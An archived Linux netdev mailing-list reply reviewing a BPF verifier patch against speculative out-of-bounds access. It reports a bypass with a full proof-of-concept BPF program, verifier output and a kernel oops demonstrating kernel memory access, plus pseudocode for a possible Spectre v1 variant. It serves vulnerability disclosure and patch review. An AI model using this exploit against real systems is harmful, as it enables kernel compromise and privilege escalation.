lists.openwall.net - Open Source and information security mailing list archives
Date: Thu, 3 Jan 2019 22:13:44 +0100
From: Jann Horn <jannh@...gle.com>
To: Daniel Borkmann <daniel@...earbox.net>
Cc: Alexei Starovoitov <ast@...nel.org>, "David S. Miller" <davem@...emloft.net>,
	jakub.kicinski@...ronome.com, Network Development <netdev@...r.kernel.org>
Subject: Re: [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on pointer arithmetic

Hi! Sorry about the extremely slow reply, I was on vacation over the
holidays and only got back today.

On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@...earbox.net> wrote:
> Jann reported that the original commit back in b2157399cc98
> ("bpf: prevent out-of-bounds speculation") was not sufficient
> to stop CPU from speculating out of bounds memory access:
> While b2157399cc98 only focussed on masking array map access
> for unprivileged users for tail calls and data access such
> that the user provided index gets sanitized from BPF program
> and syscall side, there is still a more generic form affected
> from BPF programs that applies to most maps that hold user
> data in relation to dynamic map access when dealing with
> unknown scalars or "slow" known scalars as access offset, for
> example:
[...]
> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
> +			    struct bpf_insn *insn,
> +			    const struct bpf_reg_state *ptr_reg,
> +			    struct bpf_reg_state *dst_reg,
> +			    bool off_is_neg)
> +{
[...]
> +
> +	/* If we arrived here from different branches with different
> +	 * limits to sanitize, then this won't work.
> +	 */
> +	if (aux->alu_state &&
> +	    (aux->alu_state != alu_state ||
> +	     aux->alu_limit != alu_limit))
> +		return -EACCES;

This code path doesn't get triggered in the case where the same
ALU_ADD64 instruction is used for both "ptr += reg" and
"numeric_reg += reg".
This leads to kernel read/write because the code intended to ensure
safety of the "ptr += reg" case in speculative execution ends up
clobbering the addend in the "numeric_reg += reg" case:

source code:
=============
int main(void) {
  int my_map = array_create(8, 30);
  array_set(my_map, 0, 1);

  struct bpf_insn insns[] = {
    // load map value pointer into r0 and r2
    BPF_LD_MAP_FD(BPF_REG_ARG1, my_map),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16),
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // load some number from the map into r1
    BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3),

    // branch A
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
    BPF_MOV64_IMM(BPF_REG_3, 0),
    BPF_JMP_A(2),

    // branch B
    BPF_MOV64_IMM(BPF_REG_2, 0),
    BPF_MOV64_IMM(BPF_REG_3, 0x100000),

    // *** COMMON INSTRUCTION ***
    BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1),

    // branch A
    BPF_JMP_A(4),

    // branch B
    BPF_MOV64_IMM(BPF_REG_0, 0x13371337),

    // verifier-confused branch: verifier follows fall-through, runtime follows jump
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // fake-dead code; targeted from branch A to prevent dead code sanitization
    BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
  trigger_proc(sock_fd);
}
=============

verifier output:
=============
0: (18) r1 = 0x0
2: (bf) r2 = r10
3: (07) r2 += -16
4: (7a) *(u64 *)(r10 -16) = 0
5: (85) call bpf_map_lookup_elem#1
6: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
7: (95) exit

from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
8: (71) r1 = *(u8 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
9: (55) if r1 != 0x0 goto pc+3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
10: (bf) r2 = r0
11: (b7) r3 = 0
12: (05) goto pc+2
15: (0f) r2 += r3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
16: (55) if r1 != 0x0 goto pc+1
17: (05) goto pc+4
22: (71) r0 = *(u8 *)(r0 +0)
 R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
23: (b7) r0 = 0
24: (95) exit

from 15 to 16 (speculative execution): safe

from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1 fp-16=mmmmmmmm
13: (b7) r2 = 0
14: (b7) r3 = 1048576
15: (0f) r2 += r3
16: (55) if r1 != 0x0 goto pc+1
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
17: (05) goto pc+4
22: safe

from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
18: (b7) r0 = 322376503
19: (55) if r2 != 0x100000 goto pc+2
20: (b7) r0 = 0
21: (95) exit
processed 29 insns (limit 131072), stack depth 16
=============

dmesg:
=============
[ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164 from=test pid=2185
[ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48 83 ed 28 48
[ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c 89 7d 18 31
[ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81 88 ff ff 48
[ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00 00 00 48 81
[ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e 73 0c 83 e0
[ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0 48 83 f8 00
[ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b 75 10 4c 8b
[ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78 00 48 83 ff
[ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6 ba 00 00 10
[ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09 d2 49 f7 da
[ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02
[ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04
[ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95
[ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337
[ 9948.481562] #PF error: [normal kernel read fault]
[ 9948.483878] PGD 0 P4D 0
[ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
[ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225
[ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 9948.494912] RIP: 0010:0xffffffffc01602f3
[ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31 c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc cc cc
[ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287
[ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848
[ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001
[ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002
[ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000
[ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000
[ 9948.525840] FS:  00007f2ad28ad700(0000) GS:ffff8881eb140000(0000) knlGS:0000000000000000
[ 9948.529708] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0
[ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 9948.542581] Call Trace:
[ 9948.543760]  ? sk_filter_trim_cap+0x148/0x2d0
[ 9948.545847]  ? sk_reuseport_is_valid_access+0xa0/0xa0
[ 9948.548249]  ? skb_copy_datagram_from_iter+0x6e/0x280
[ 9948.550655]  ? _raw_spin_unlock+0x16/0x30
[ 9948.552581]  ? deactivate_slab.isra.68+0x59d/0x600
[ 9948.554866]  ? unix_scm_to_skb+0xd1/0x230
[ 9948.556780]  ? unix_dgram_sendmsg+0x312/0x940
[ 9948.558856]  ? unix_stream_connect+0x980/0x980
[ 9948.560986]  ? aa_sk_perm+0x10c/0x3f0
[ 9948.563123]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.565107]  ? aa_af_perm+0x1e0/0x1e0
[ 9948.566608]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.568463]  ? unix_stream_connect+0x980/0x980
[ 9948.570397]  ? sock_sendmsg+0x6d/0x80
[ 9948.571948]  ? sock_write_iter+0x121/0x1c0
[ 9948.573678]  ? sock_sendmsg+0x80/0x80
[ 9948.575258]  ? sock_enable_timestamp+0x60/0x60
[ 9948.576958]  ? iov_iter_init+0x86/0xc0
[ 9948.578395]  ? __vfs_write+0x294/0x3b0
[ 9948.579782]  ? kernel_read+0xa0/0xa0
[ 9948.581152]  ? apparmor_task_setrlimit+0x330/0x330
[ 9948.582919]  ? vfs_write+0xe7/0x230
[ 9948.584228]  ? ksys_write+0xa1/0x120
[ 9948.585559]  ? __ia32_sys_read+0x50/0x50
[ 9948.587174]  ? do_syscall_64+0x73/0x160
[ 9948.588872]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq
[ 9948.593654] CR2: 0000000013371337
[ 9948.595078] ---[ end trace cea5ab7027131bf2 ]---
=============

Aside from that, I also think that the pruning of "dead code" probably
still permits v1 speculative execution attacks when code vaguely like
the following is encountered, if it is possible to convince the CPU to
mispredict the second branch, but I haven't tested that so far:

R0 = <slow map value, known to be 0>;
R1 = <fast map value>;
if (R1 != R0) { // mispredicted
  return 0;
}
R3 = <a map value pointer>;
R2 = <arbitrary 64-bit number>;
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];

To convince the CPU to predict the second branch the way you want, you
could probably add another code path that jumps in front of the branch
with both R2 and R3 already containing valid pointers. Something like
this:

if (<some map value>) {
  R0 = <slow map value, known to be 0>;
  R1 = <fast map value>;
  if (R1 != R0) { // mispredicted
    return 0;
  }
  R3 = <a map value pointer>;
  R2 = <arbitrary 64-bit number>;
} else {
  R3 = <a map value pointer>;
  R2 = <arbitrary 64-bit number>;
  R1 = 1;
}
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];